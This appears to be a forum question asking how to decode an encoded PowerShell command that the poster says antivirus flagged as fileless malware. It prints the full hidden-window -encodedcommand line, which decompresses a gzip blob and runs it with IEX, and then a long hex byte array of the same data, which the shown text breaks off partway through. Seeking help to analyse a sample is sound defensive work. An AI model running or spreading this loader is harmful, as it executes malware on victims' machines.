# powershell decode gzip stream encoded string

Tags: powershell, encryption, decode, gzipstream

Can you please help me to decode some encoded commands when I tried I got error related this.
Copying the encoded PowerShell command . Please do not run could be malicious ( this is a fileless malware) From our antivirus solution we got also a formatted string but tried to extract the string unsuccessfully.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYASQB4AEIAVQBhAE4ANwBhAHEAcwBXAEYAUgBRAEYAVgBGADYATQBtAHAATgBLAEkAUQB3AEUAdwA1AHMAdwBLAEgAaAAyAC8ALwB0AHAAVQBIAE8AeQBaADUATgA3AHQAKwBwAGUAcQB5AGkASABtAGUANgBlADcAcQBlAGYANgBXAGsAVQBoAEcAOABWAEgARABrAEcARgBnAE0AVABFAGIAYwBMAEYATQBWAE8ANABCAE8ATgBVAHUAbAA2AEUAUABDAFkAKwBFAHAAOABLADUAZQBzAHgARABkAHcAUABwADAAUABuAG0AMgBFAG4AOABNAG8ATQBKADUAMQAwADQAeABRAEgAQgBOAC8AbABhADUAbQBlAHEAUgA3AFIATwBWADYAcgAwAGYAUABYAG0AQQBtAEwAcQBvAFMAeABVAHMAdQBpAE0AdwBrAFEAdQBUAFYAVgBlAG0AcQBtAEUAcgA4AFcATABmAFEAcwA2ADkAagBaADQAKwBlAFAAWQBSAGYAQQBqAE8ARwBqAFMAcQBQAFQAQgBnAE8AQQBrADkAMwAvAEsAYwB2AFgALwBwAEoARgBDAEUAZgBuADkANQByAFEANABTAFoATwBFAGIAZQB4AG4AVgBRAFgAQwBHAEoANwA4AFQARABDADQAcgBRADcAWABTAHoAUgBRAFkAbQAvAGkASwB1AG4AMgB0AEQATgA5AGoAbwA3AGwAawBzADYAKwB2AEcAQwB3AFQARQArAEcAYQArAEoAZwBTAEcAbgBrAGQAUQBVADAATABYAHcAWgBYAHkAbgAzACsAVwB5AGMAZgBiACsAbABPAE4AMwBTAFcANgBHADEAZgBLAFMAaABaAGoANQBOAFYATQAxAHkAMgBUAHgAQQA4AHkAMwAxAEQATgBRAGwAUQBwAGkANAA0AFIAQgBYAEYAZwA0AGQAcQBEADQAOQBPAE4AbQBsAFoANABMAHgAWABPAGkAeQBmAGYAeQArAFEANQBNAGoAdgBVAEkAWQA3AFAAZwA4AHkAdABuAG4AUQBxAFoAUgBqAE8AQQBCAHYAbQBoAEcARwA1AFMAagB6AG0AKwB6ADAAKwBQAFIASABmADMAcgB5AFIARQB4ADgANwBIAHEAcgB4AFAAawBaAFIARQBDAG8AbwAyAGoAcwBHAGkAbQBzAGoAMwBUAGQAZABKAEMATQBMADEATQBvAHgAcABNACsAMwB5AHkAUQA0AEUAUwBHAGMAUgBEADUAeAA4AFEAWAAwADkAcwBFAHIAcQBsAHoANwBpAGUAdABXAHcAZQA3AGoANwA5AHAAOQBxAGsAagBvAGMAQQBIADMAZAA1AFUAcQA3ADUAVgBBAGEAbwBZAGoAcwBuAHIAbQB4AE8ALwBBAEkAUgBhADgATwBaAG0ARABjAEgANwB4AC8AaAAyADUAUwBQAGoAOQBRAGoAQwB5ADkASwBQADAAQQBWAFYATgA1AEMASgBiAHgAKwBnAFoAQQA3ADcAdgB1AEYAcQA2AHUAbgBvAHMAaABnAGoAaQBxAGMAeQBDADIAQwBuADAAdgBoAEoAVQBsAFIARABCAEMAUgAwAEgAVQBaAGEAbgBVADQAMABTAFIARAA3ADkAawA1AC8AVAB0AGgAZgBOAHUAUABxAHAAbwBmAHAARgA2ADYAeAB6AFMAcwAvAEoAagA2AC8ARQA0AHkASgB3AHoASwBmAFMARgBWAGsANgBzAHkAZQBmAGYAOQA0AGsAagBtAHUAaQBLAEYALwAvAC8ARABRAE0AawBPAFgANABhAEoARAA1AHUAdQBjAFkARgA4AEoAWABQAHMAbwBaAHMAbAB4AFUANABGAEcANwBpAEUAbgBnAFoANgBWADgAWABrAEQAbQA0AEkAeABPAE8AUQBmADAAOABWAGMAMQAxAG4AUAB3AG0AMgA3AHYANQBCAHgAagBRAE4ANQBqADgAQQBvAG8AUQBmADcAcwB6AEMAbQBIAGwAVABMAHYAaQA4AGcARAAvAEUANwB2AFEATgBOAHIAQwA0ADQAWgB1AGsAaQBmAGoAMQBaADIAMgBUADEALwB6ADcAbgBjAGQALwBVADQAcgBoAEsAegBCAE0ANgA1AFUAUwBVAFUAcABMAHYASQByAEIASwBNAEgAegB2AG4ASgBTAGIAQgBRAFQARQBzAC8AKwBPAHUAbQBMAGoAWQBNAGYAUQBZAFgAOAB3ADkAawBSADkAQQBlAHQANgA2AEgALwBoAHcAWQBoAEkARABzAGcAcwB3AHEARQBxAEkARABFAGQAMwBjADEAUwBxAHgATQBnAHgAVQBTADkAVABIAFAAdgBpAFEAdgBsAEQAVABQAHEANgA2ADgASwBSAEEAMAB0ADcAeQBBAG4ATQA1AEYAZwBvAE8ATwBkAE0AWgBGAGIALwB6AFEAKwB5AHAAaQBEAE0AZQA2AEcATABQAEoAQQB1AHEAaABEAG4ANgBqAGIAVQBuAFAATwBKAEsAdQBpAG0AMgA4AGcAcwAvAHcAZQAzAEwAKwBmAGsAZABDAGgAeQByAEMANABnAHYAWABNAGEAQwBLAEMANABBAGEANABTAEMAeQBmAEMAVQBOAGYASwAxAFYAKwBJADkANwArADUAOQAzAE8ASgArAGMAbgBOAGYAbwBUAE8AaQBhAHcAVQBCAC8ARwB4AGwAKwBIADgAdQBCAFMAUwBSAG4ANgA1AGYASAAzAEQAcwBrAEEAdQB3AG8AQQBhAEYAdwBWAGUAVAA0ADkAUgB1ADYAawBVAFoAYQB4AFMAcABqAHYASgBqAHMALwBFADcAYgB3AGQARABkAGsAOQBOADkAcQBOAFcAQgBXAGUAUABUAHoAMABqAG0ATQBGAFkAUwB5AEgAUABWAGsAdwAyAEcAUQA2AEcAMQBGAGoAaQA1ADkAMwBCAHMAMwBrAGsAUABDAEoAMgBxAE4AbwBqAGcASwA1ADQAMgA3AEkAVwB2AHgAKwBHAHEAegBxAGkAZABlAHMAbQB5AEcALwBsADIAQQB1AHYAdAArAE4ANABnAEcALwBIAHoAQwBqAHgAaQA3AGcAMgByAGIAVABQAGQAcwA1ADYAYwA4ADMAaAAvAHAAbQB5AFgAUAAzAG0AeQBIAFgASABDADEAaQBMAHAAYwBmADgAZgBzAGUAdAArAHQAMwBBAHgAagBmADgAZgB0ACsATQBBAGEAOQBUAGoAdgAwAGUAdwBlAHoAaQBkAGgAeABHAHkAMABGADQAMABEAGoARAB0AEwAdABOAEoAcwBzAGIAaABTAHEAUABsAHgAawBrAHIAQgBnAFEAMABuAHgAVABXAEYAVABuADMATgBqADYAZABoAGcAYwBVAHEAWgBJADUAawB5ADIAWABoAHQATABuAFkAcwBQAGQAdABNAFEAbwBpAFQAcAAyADIAbAA3AFkAOAB6AFIAZQBsAGwAeABpAHMAKwA1AHIARQBiAEkAMABrAHcASgA3AHQATwB5AHoAdwAyAE0AawA1AHEAQQBnADYAcABrAG8AawB2AHEANwBhAFoARwBrAHYAdQBZAEMAdwBsAEkAUgB1AHQAcABDAEgAWQAzAFMAVQBQAGQAbgBNAGsASwBqAFQAWQBWAHMAegAwAFkARwByAHgAZABLAHoAaQBGAFQAMwBUAHYAVwBhAFcAKwBjADAAKwB2ACsAVgBUAHcAUQBqAHgAWQBqAGwAdQBSADMAcgBXAEQAdwBVAEgAYgBYAG8AVwB6AG4AWABIAHcAdABvAGUAZAAxAGwAOAA4AGsAOQBSADUATQB3AEUAMgArADUASQBIAFUAegBBAHQAdAA4AFgAUgBmAEIASABiADMARgBJAEEANQBsAEoANwBJAEMAdABUAHIAVABqAEgAWABHAGIAdABiAGMARwBMAFIAMQBFADAAeAArAEgASwB2AGkAMgBWAGEATwA3AHUANwBFAHMAMwAzAFUATgBzAGUASABmAGQAKwBkAE4AaQBtAG0AYgBsAEkAQgBVAG8AYgB2AHcAUgB4AEYAdABkAEYATwBOAG0AMgAwAFQAagBxAEgAagA1AEwANwBSAFYANABZAHIAZQBaADAAawB5AE4ASAB1AEUAMAB0AHgAUgBwADQAZwBIADAAeAB2AGEAOQBqAGoAQgBrAFAAeABxAHoAZwBMAHcAMgBqADcAbwBLAG8AeQBmAFYAQgA0AHQAOABYAFQANgA3AG4AcwBzAHQAUABWAHEAegB4AFUARgA4AGEAYQBhAGIAVABFAEIAeQAyAGMAcQBSAFEAdgBjAGoAYQBsAE0AZwBmAE0AcQBHAHgATABuAGIAdgBtAFoASwA1ADEAaAAwAE4ARwBTAG8AeABoADYARABGAHAASQBMAEcAcABQAFQAQQBoAEgAegBLAFYAYQBoAG8AagBZAGYATQBnAEwAZwBZAHkAdgAyAEoAbwBPAFQAWgA3ADIAaABKAGsAYQBVADAATABSAC8ASgByAGYAVABuAG8AcgBRAHIANQBqAFQAZgBHAEcAegB0AEkASgBvAHAANAAwAHgATABxADMATQAzAEQAWgBtAGMAeABIAFcAUABuAEwAUABXADcAZQBNAFoASQB6AFAAUwBBAFcARAB0AHkAbABrAGkAVAAxAHYAdQA5AE8AbAB6ADMAVgBjAFAAVQBPAGkANABmAHgAbQBuADMAdgBtADkAUQBlADAATwBkAEQATwBSAFkARwA3ADQAbQBMAHcAZAA3AE0ARgAyAHUARwAxAEUATAArADIAYgBrAEoAZwBOAEcAbgBqAFYAWQBlADkAcABLADAAYgBGAHgAdwArAGwARwAzAFgARwBEAHkAZAAyAFcAMgByAHoAdQBSAG8ANAB6AG4AYgAwAEsAOQBhAHcAKwBUADgAZABKAGMAOQBUADEAagA4ADMAMQB3ADUASABoAHgAdQBtAFUAMwBqADQAQQBWADIANwBhAEsAegBwAGoASwBOAHUAdABUAC8AVAAyAFAAcQBWADIAMgA5AGYANQBHAEsAMABOADEAaABiADIAYwBvAFoAOABKAEUAKwB0AHIAdABWAGgANQBkAEEANABxAHAAMABiAEwAcgBLADIAYgBVAGYAYgBxAEUANwBRAFMAcQBQAGwAbgBhAFkAMQA2ADAAdgBtAGIAbQB2ADUATAAzAE8AMQBjADkAOABLAHgAZQA3AFcANwBLAEIAaABaADEANAAvADkARABwADMAMwBtAEsAOQBHAEsAMABhADIAUgAyAFgAMwBFADgAdAB0AG0AbQA4ADMAZwBRAGIAdQBVAGwATgBjAEgAOQBKAEgAZABKADYAZQB6AGEAUgBPAEUANQBiAEcAdwBiAFYAbAB3AFMAcQBwAGYAZABNADQASwBuAHkASQBBAG4AOABFAGYAaABNAHgAVgB1ACsASQBXADUATgBGAHQAKwAvADAASQBNAGgAOABQAEQAZwBBAFYAKwBBAFIAOAA2AE4AUAB6ADcAcwBZAHUAQgBwAEoAZwA3ADQAVABNAHEANQBtAG0ASQA5ADYAaABWAGMAcgBWAHYAdQByAGoAOQAzAG0AcABQAE4AZABoAEcAdgA3ADUAdABpAE0AcQBIAHgAMABlAEIAUwB5AE0AZgBMAGEAagA2AFEAMgBTAFYAcgBVADMATwB1AEwANgBZAGMAcgBXADMAegBhAG0AUQBGAEUAZgBRAFgAYQBYADUAbgAvADAASABBAC8ANgAyAEwAaQBiAGQANgBBADEAVQBHAEMAbABnACsAZgAzAE4ARAA1AHYAZgArADIAOAByAGoAZABmAHAAMAA2AGQAUABlADMAbQA4ADMASwBWAGkAagBXADMAbgB0AEsAbABiADIAKwByAHUASwA5AFYAbgB6AEkAKwBwAFIALwBLAEsANwBVAE0AbQBnAGcAYgBsAGMAUAAxAHcAUQBjAGUAYwAyAFoAQgBZADQAdQBVAGEAbAA4AG4ASABuAC8ASQBvAGkASAA3AG4AUQBWAFUATABmAGUAUwBuAGEAagBPAHMARwBSAHQANAA0AGYAZABMAEIAUQBCAHQAMwBhAHEANgBlADQASABMAFMAWQBFAGcAMwBQAGgAeQBSAHgASgBzAGcAZABFAHUAbgBtAEQAYQBKAFoAUgBYAE4AeABUAG4AQwBTADQAOQAxAEUAZgB6AHkAWgBRADMAaABWAGQAKwBCAEsAQwBEAGYAeABpADkAVgBnAGsAcABwAGkAcQBMAHkALwB5AFoARgBsAG4ANABmAGwAbgA0AFEAWgBwAFUAMwBjADkAVwA4AHUAWAByAG4AeQBmAHUAZAAzAEcASQBuADgAbwB4ACsAbABQAGcAZQArAGoAOABtADQASwBkAE4ALwB6AHUAMABPAFgAaABGAGYALwBZAEcAWABlAEgAUQB4ADMAaQBSAHAAZgBLADMAVQBvAG0AMwBpAEgAZgB6AHMAWABPAEUAcgB3ACsAMABJAHoAbwBGADkAMgBLAGcATwBiADcAZABCAGgAdgA0AFYAQwBuAHUAMwBzAHEAMQBUAGgASQA4AHUAeQBTAHUAZABlAEkASABjAFEAdgBoAE0AVABIAGQAZwBPACsAVgB5AEUANwB5AGkANQBnADQAZgBYADUAOQBKAHcANgA2AGMAMQBMADgAVABzAGoASQBRAE4AQQArADMANAA2AEQARABiAEEAVQBRAFQAKwBWAG0AeQA2AE0ANQBNAEkAdwA5AHoAZABPAEEARQB5AEgAegB3ADAAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

Formatted PowerShell Script

$s = [byte[]](0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xad, 0x57, 0x6d, 0x73, 0xa2, 0xca, 0x12, 0xfe, 0x1c, 0x7f, 0x05, 0x1f, 0x52, 0xa5, 0x54, 0x8c, 0x41, 0x51, 0xa3, 0x7b, 0x6a, 0xab, 0x16, 0x15, 0x14, 0x05, 0x54, 0x5e, 0x8c, 0x9a, 0x93, 0x4a, 0x21, 0x0c, 0x04, 0xc3, 0x9b, 0x30, 0x28, 0x78, 0x76, 0xff, 0xfb, 0x69, 0x50, 0x73, 0xb2, 0x67, 0x93, 0x7b, 0xb7, 0xea, 0x5e, 0xab, 0x28, 0x87, 0x99, 0xee, 0x9e, 0xee, 0xa7, 0x9f, 0xe9, 0x69, 0x14, 0x84, 0x6f, 0x15, 0x1c, 0x39, 0x06, 0x16, 0x03, 0x13, 0x11, 0xb7, 0x0b, 0x14, 0xc5, 0x4e, 0xe0, 0x13, 0x8d, 0x52, 0xe9, 0x7a, 0x10, 0xf0, 0x98, 0xf8, 0x4a, 0x7c, 0x2b, 0x97, 0xac, 0xc4, 0x37, 0x70, 0x3e, 0x9d, 0x0f, 0x9e, 0x6d, 0x84, 0x9f, 0xc3, 0x28, 0x30, 0x9e, 0x75, 0xd3, 0x8c, 0x50, 0x1c, 0x13, 0x7f, 0x95, 0xae, 0x66, 0x7a, 0xa4, 0x7b, 0x44, 0xe5, 0x7a, 0xaf, 0x47, 0xcf, 0x5e, 0x60, 0x26, 0x2e, 0xaa, 0x12, 0xc5, 0x4b, 0x2e, 0x88, 0xcc, 0x24, 0x42, 0xe4, 0xd5, 0x55, 0xe9, 0xaa, 0x98, 0x4a, 0xfc, 0x58, 0xb7, 0xd0, 0xb3, 0xaf, 0x63, 0x67, 0x8f, 0x9e, 0x3d, 0x84, 0x5f, 0x02, 0x33, 0x86, 0x8d, 0x2a, 0x8f, 0x4c, 0x18, 0x0e, 0x02, 0x4f, 0x77, 0xfc, 0xa7, 0x2f, 0x5f, 0xfa, 0x49, 0x14, 0x21, 0x1f, 0x9f, 0xde, 0x6b, 0x43, 0x84, 0x99, 0x38, 0x46, 0xde, 0xc6, 0x75, 0x50, 0x5c, 0x21, 0x89, 0xef, 0xc4, 0xc3, 0x0b, 0x8a, 0xd0, 0xed, 0x74, 0xb3, 0x45, 0x06, 0x26, 0xfe, 0x22, 0xae, 0x9f, 0x6b, 0x43, 0x37, 0xd8, 0xe8, 0xee, 0x59, 0x2c, 0xeb, 0xeb, 0xc6, 0x0b, 0x04, 0xc4, 0xf8, 0x66, 0xbe, 0x26, 0x04, 0x86, 0x9e, 0x47, 0x50, 0x53, 0x42, 0xd7, 0xc1, 0x95, 0xf2, 0x9f, 0x7f, 0x96, 0xc9, 0xc7, 0xdb, 0xfa, 0x53, 0x8d, 0xdd, 0x25, 0xba, 0x1b, 0x57, 0xca, 0x4a, 0x16, 0x63, 0xe4, 0xd5, 0x4c, 0xd7, 0x2d, 0x93, 0xc4, 0x0f, 0x32, 0xdf, 0x50, 0xcd, 0x42, 0x54, 0x29, 0x8b, 0x8e, 0x11, 0x05, 0x71, 0x60, 0xe1, 0xda, 0x83, 0xe3, 0xd3, 0x8d, 0x9a, 0x56, 0x78, 0x2f, 0x15, 0xce, 0x8b, 0x27, 0xdf, 0xcb, 0xe4, 0x39, 0x32, 0x3b, 0xd4, 0x21, 0x8e, 0xcf, 0x83, 0xcc, 0xad, 0x9e, 0x74, 0x2a, 0x65, 0x18, 0xce, 0x00, 0x1b, 0xe6, 0x84, 0x61, 0xb9, 0x4a, 0x3c, 0xe6, 0xfb, 0x3d, 0x3e, 0x3d, 0x11, 0xdf, 0xde, 0xbc, 0x91, 0x13, 0x1f, 0x3b, 0x1e, 0xaa, 0xf1, 0x3e, 0x46, 0x51, 0x10, 0x2a, 0x28, 0xda, 0x3b, 0x06, 0x8a, 0x6b, 0x23, 0xdd, 0x37, 0x5d, 0x24, 0x23, 0x0b, 0xd4, 0xca, 0x31, 0xa4, 0xcf, 0xb7, 0xcb, 0x24, 0x38, 0x11, 0x21, 0x9c, 0x44, 0x3e, 0x71, 0xf1, 0x05, 0xf4, 0xf6, 0xc1, 0x2b, 0xaa, 0x5c, 0xfb, 0x89, 0xeb, 0x56, 0xc1, 0xee, 0xe3, 0xef, 0xda, 0x7d, 0xaa, 0x48, 0xe8, 0x70, 0x01, 0xf7, 0x77, 0x95, 0x2a, 0xef, 0x95, 0x40, 0x6a, 0x86, 0x23, 0xb2, 0x7a, 0xe6, 0xc4, 0xef, 0xc0, 0x21, 0x16, 0xbc, 0x39, 0x99, 0x83, 0x70, 0x7e, 0xf1, 0xfe, 0x1d, 0xb9, 0x48, 0xf8, 0xfd, 0x42, 0x30, 0xb2, 0xf4, 0xa3, 0xf4, 0x01, 0x55, 0x4d, 0xe4, 0x22, 0x5b, 0xc7, 0xe8, 0x19, 0x03, 0xbe, 0xef, 0xb8, 0x5a, 0xba, 0xba, 0x7a, 0x2c, 0x86, 0x08, 0xe2, 0xa9, 0xcc, 0x82, 0xd8, 0x29, 0xf4, 0xbe, 0x12, 0x54, 0x95, 0x10, 0xc1, 0x09, 0x1d, 0x07, 0x51, 0x96, 0xa7, 0x53, 0x8d, 0x12, 0x44, 0x3e, 0xfd, 0x93, 0x9f, 0xd3, 0xb6, 0x17, 0xcd, 0xb8, 0xfa, 0xa9, 0xa1, 0xfa, 0x45, 0xeb, 0xac, 0x73, 0x4a, 0xcf, 0xc9, 0x8f, 0xaf, 0xc4, 0xe3, 0x22, 0x70, 0xcc, 0xa7, 0xd2, 0x15, 0x59, 0x3a, 0xb3, 0x27, 0x9f, 0x7f, 0xde, 0x24, 0x8e, 0x6b, 0xa2, 0x28, 0x5f, 0xff, 0xfc, 0x34, 0x0c, 0x90, 0xe5, 0xf8, 0x68, 0x90, 0xf9, 0xba, 0xe7, 0x18, 0x17, 0xc2, 0x57, 0x3e, 0xca, 0x19, 0xb2, 0x5c, 0x54, 0xe0, 0x51, 0xbb, 0x88, 0x49, 0xe0, 0x67, 0xa5, 0x7c, 0x5e, 0x40, 0xe6, 0xe0, 0x8c, 0x4e, 0x39, 0x07, 0xf4, 0xf1, 0x57, 0x35, 0xd6, 0x73, 0xf0, 0x9b, 0x6e, 0xef, 0xe4, 0x1c, 0x63, 0x40, 0xde, 0x63, 0xf0, 0x0a, 0x28, 0x41, 0xfe, 0xec, 0xcc, 0x29, 0x87, 0x95, 0x32, 0xef, 0x8b, 0xc8, 0x03, 0xfc, 0x4e, 0xef, 0x40, 0xd3, 0x6b, 0x0b, 0x8e, 0x19, 0xba, 0x48, 0x9f, 0x8f, 0x56, 0x76, 0xd9, 0x3d, 0x7f, 0xcf, 0xb9, 0xdc, 0x77, 0xf5, 0x38, 0xae, 0x12, 0xb3, 0x04, 0xce, 0xb9, 0x51, 0x25, 0x14, 0xa4, 0xbb, 0xc8, 0xac, 0x12, 0x8c, 0x1f, 0x3b, 0xe7, 0x25, 0x26, 0xc1, 0x41, 0x31, 0x2c, 0xff, 0xe3, 0xae, 0x98, 0xb8, 0xd8, 0x31, 0xf4, 0x18, 0x5f, 0xcc, 0x3d, 0x91, 0x1f, 0x40, 0x7a, 0xde, 0xba, 0x1f, 0xf8, 0x70, 0x62, 0x12, 0x03, 0xb2, 0x0b, 0x30, 0xa8, 0x4a, 0x88, 0x0c, 0x47, 0x77, 0x73, 0x54, 0xaa, 0xc4, 0xc8, 0x31, 0x51, 0x2f, 0x53, 0x1c, 0xfb, 0xe2, 0x42, 0xf9, 0x43, 0x4c, 0xfa, 0xba, 0xeb, 0xc2, 0x91, 0x03, 0x4b, 0x7b, 0xc8, 0x09, 0xcc, 0xe4, 0x58, 0x28, 0x38, 0xe7, 0x4c, 0x64, 0x56, 0xff, 0xcd, 0x0f, 0xb2, 0xa6, 0x20, 0xcc, 0x7b, 0xa1, 0x8b, 0x3c, 0x90, 0x2e, 0xaa, 0x10, 0xe7, 0xea, 0x36, 0xd4, 0x9c, 0xf3, 0x89, 0x2a, 0xe8, 0xa6, 0xdb, 0xc8, 0x2c, 0xff, 0x07, 0xb7, 0x2f, 0xe7, 0xe4, 0x74, 0x28, 0x72, 0xac, 0x2e, 0x20, 0xbd, 0x73, 0x1a, 0x08, 0xa0, 0xb8, 0x01, 0xae, 0x12, 0x0b, 0x27, 0xc2, 0x50, 0xd7, 0xca, 0xd5, 0x5f, 0x88, 0xf7, 0xbf, 0xb9, 0xf7, 0x73, 0x89, 0xf9, 0xc9, 0xcd, 0x7e, 0x84, 0xce, 0x89, 0xac, 0x14, 0x07, 0xf1, 0xb1, 0x97, 0xe1, 0xfc, 0xb8, 0x14, 0x92, 0x46, 0x7e, 0xb9, 0x7c, 0x7d, 0xc3, 0xb2, 0x40, 0x2e, 0xc2, 0x80, 0x1a, 0x17, 0x05, 0x5e, 0x4f, 0x8f, 0x51, 0xbb, 0xa9, 0x14, 0x65, 0xac, 0x52, 0xa6, 0x3b, 0xc9, 0x8e, 0xcf, 0xc4, 0xed, 0xbc, 0x1d, 0x0d, 0xd9, 0x3d, 0x37, 0xda, 0x8d, 0x58, 0x15, 0x9e, 0x3d, 0x3c, 0xf4, 0x8e, 0x63, 0x05, 0x61, 0x2c, 0x87, 0x3d, 0x59, 0x30, 0xd8, 0x64, 0x3a, 0x1b, 0x51, 0x63, 0x8b, 0x9f, 0x77, 0x06, 0xcd, 0xe4, 0x90, 0xf0, 0x89, 0xda, 0xa3, 0x68, 0x8e, 0x02, 0xb9, 0xe3, 0x6e, 0xc8, 0x5a, 0xfc, 0x7e, 0x1a, 0xac, 0xea, 0x89, 0xd7, 0xac, 0x9b, 0x21, 0xbf, 0x97, 0x60, 0x2e, 0xbe, 0xdf, 0x8d, 0xe2, 0x01, 0xbf, 0x1f, 0x30, 0xa3, 0xc6, 0x2e, 0xe0, 0xda, 0xb6, 0xd3, 0x3d, 0xdb, 0x39, 0xe9, 0xcf, 0x37, 0x87, 0xfa, 0x66, 0xc9, 0x73, 0xf7, 0x9b, 0x21, 0xd7, 0x1c, 0x2d, 0x62, 0x2e, 0x97, 0x1f, 0xf1, 0xfb, 0x1e, 0xb7, 0xeb, 0x77, 0x03, 0x18, 0xdf, 0xf1, 0xfb, 0x7e, 0x30, 0x06, 0xbd, 0x4e, 0x3b, 0xf4, 0x7b, 0x07, 0xb3, 0x89, 0xd8, 0x71, 0x1b, 0x2d, 0x05, 0xe3, 0x40, 0xe3, 0x0e, 0xd2, 0xed, 0x34, 0x9b, 0x2c, 0x6e, 0x14, 0xaa, 0x3e, 0x5c, 0x64, 0x92, 0xb0, 0x60, 0x43, 0x49, 0xf1, 0x4d, 0x61, 0x53, 0x9f, 0x73, 0x63, 0xe9, 0xd8, 0x60, 0x71, 0x4a, 0x99, 0x23, 0x99, 0x32, 0xd9, 0x78, 0x6d, 0x2e, 0x76, 0x2c, 0x3d, 0xdb, 0x4c, 0x42, 0x88, 0x93, 0xa7, 0x6d, 0xa5, 0xed, 0x8f, 0x33, 0x45, 0xe9, 0x65, 0xc6, 0x2b, 0x3e, 0xe6, 0xb1, 0x1b, 0x23, 0x49, 0x30, 0x27, 0xbb, 0x4e, 0xcb, 0x3c, 0x36, 0x32, 0x4e, 0x6a, 0x02, 0x0e, 0xa9, 0x92, 0x89, 0x2f, 0xab, 0xb6, 0x99, 0x1a, 0x4b, 0xee, 0x60, 0x2c, 0x25, 0x21, 0x1b, 0xad, 0xa4, 0x21, 0xd8, 0xdd, 0x25, 0x0f, 0x76, 0x73, 0x24, 0x2a, 0x34, 0xd8, 0x56, 0xcc, 0xf4, 0x60, 0x6a, 0xf1, 0x74, 0xac, 0xe2, 0x15, 0x3d, 0xd3, 0xbd, 0x66, 0x96, 0xf9, 0xcd, 0x3e, 0xbf, 0xe5, 0x53, 0xc1, 0x08, 0xf1, 0x62, 0x39, 0x6e, 0x47, 0x7a, 0xd6, 0x0f, 0x05, 0x07, 0x6d, 0x7a, 0x16, 0xce, 0x75, 0xc7, 0xc2, 0xda, 0x1e, 0x77, 0x59, 0x7c, 0xf2, 0x4f, 0x51, 0xe4, 0xcc, 0x04, 0xdb, 0xee, 0x48, 0x1d, 0x4c, 0xc0, 0xb6, 0xdf, 0x17, 0x45, 0xf0, 0x47, 0x6f, 0x71, 0x48, 0x03, 0x99, 0x49, 0xec, 0x80, 0xad, 0x4e, 0xb4, 0xe3, 0x1d, 0x71, 0x9b, 0xb5, 0xb7, 0x06, 0x2d, 0x1d, 0x44, 0xd3, 0x1f, 0x87, 0x2a, 0xf8, 0xb6, 0x55, 0xa3, 0xbb, 0xbb, 0xb1, 0x2c, 0xdf, 0x75, 0x0d, 0xb1, 0xe1, 0xdf, 0x77, 0xe7, 0x4d, 0x8a, 0x69, 0x9b, 0x94, 0x80, 0x54, 0xa1, 0xbb, 0xf0, 0x47, 0x11, 0x6d, 0x74, 0x53, 0x8d, 0x9b, 0x6d, 0x13, 0x8e, 0xa1, 0xe3, 0xe4, 0xbe, 0xd1, 0x57, 0x86, 0x2b, 0x79, 0x9d, 0x24, 0xc8, 0xd1, 0xee, 0x13, 0x4b, 0x71, 0x46, 0x9e, 0x20, 0x1f, 0x4c, 0x6f, 0x6b, 0xd8, 0xe3, 0x06, 0x43, 0xf1, 0xab, 0x38, 0x0b, 0xc3, 0x68, 0xfb, 0xa0, 0xaa, 0x32, 0x7d, 0x50, 0x78, 0xb7, 0xc5, 0xd3, 0xeb, 0xb9, 0xec, 0xb2, 0xd3, 0xd5, 0xab, 0x3c, 0x54, 0x17, 0xc6, 0x9a, 0x69, 0xb4, 0xc4, 0x07, 0x2d, 0x9c, 0xa9, 0x14, 0x2f, 0x72, 0x36, 0xa5, 0x32, 0x07, 0xcc, 0xa8, 0x6c, 0x4b, 0x9d, 0xbb, 0xe6, 0x64, 0xae, 0x75, 0x87, 0x43, 0x46, 0x4a, 0x8c, 0x61, 0xe8, 0x31, 0x69, 0x20, 0xb1, 0xa9, 0x3d, 0x30, 0x21, 0x1f, 0x32, 0x95, 0x6a, 0x1a, 0x23, 0x61, 0xf3, 0x20, 0x2e, 0x06, 0x32, 0xbf, 0x62, 0x68, 0x39, 0x36, 0x7b, 0xda, 0x12, 0x64, 0x69, 0x4d, 0x0b, 0x47, 0xf2, 0x6b, 0x7d, 0x39, 0xe8, 0xad, 0x0a, 0xf9, 0x8d, 0x37, 0xc6, 0x1b, 0x3b, 0x48, 0x26, 0x8a, 0x78, 0xd3, 0x12, 0xea, 0xdc, 0xcd, 0xc3, 0x66, 0x67, 0x31, 0x1d, 0x63, 0xe7, 0x2c, 0xf5, 0xbb, 0x78, 0xc6, 0x48, 0xcc, 0xf4, 0x80, 0x58, 0x3b, 0x72, 0x96, 0x48, 0x93, 0xd6, 0xfb, 0xbd, 0x3a, 0x5c, 0xf7, 0x55, 0xc3, 0xd4, 0x3a, 0x2e, 0x1f, 0xc6, 0x69, 0xf7, 0xbe, 0x6f, 0x50, 0x7b, 0x43, 0x9d, 0x0c, 0xe4, 0x58, 0x1b, 0xbe, 0x26, 0x2f, 0x07, 0x7b, 0x30, 0x5d, 0xae, 0x1b, 0x51, 0x0b, 0xfb, 0x66, 0xe4, 0x26, 0x03, 0x46, 0x9e, 0x35, 0x58, 0x7b, 0xda, 0x4a, 0xd1, 0xb1, 0x71, 0xc3, 0xe9, 0x46, 0xdd, 0x71, 0x83, 0xc9, 0xdd, 0x96, 0xda, 0xbc, 0xee, 0x46, 0x8e, 0x33, 0x9d, 0xbd, 0x0a, 0xf5, 0xac, 0x3e, 0x4f, 0xc7, 0x49, 0x73, 0xd4, 0xf5, 0x8f, 0xcd, 0xf5, 0xc3, 